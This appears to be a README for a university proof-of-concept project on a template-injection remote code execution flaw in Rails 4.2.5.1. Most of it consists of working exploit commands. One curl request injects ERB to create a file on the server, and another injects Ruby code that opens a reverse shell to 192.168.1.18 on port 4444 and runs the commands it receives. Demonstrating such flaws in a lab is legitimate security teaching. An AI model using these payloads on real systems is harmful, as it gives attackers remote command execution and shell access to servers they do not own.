University project created by @alejandro-marting where we can check the vulnerability 2096
Using:
- rails 4.2.5.1
- view has a vulnerable code app/views/poc/render1.html.erb
##Execution: In first place we need run the rails server with the following command:
$ rvmsudo rails server -b 0.0.0.0 -p 80
Now we can cause the remote code execution with the next command:
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
(A rooted file should be generate)
If you want try a reverse shell with ruby code inyection, you can run the next command:
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
If you have any question contact with me please!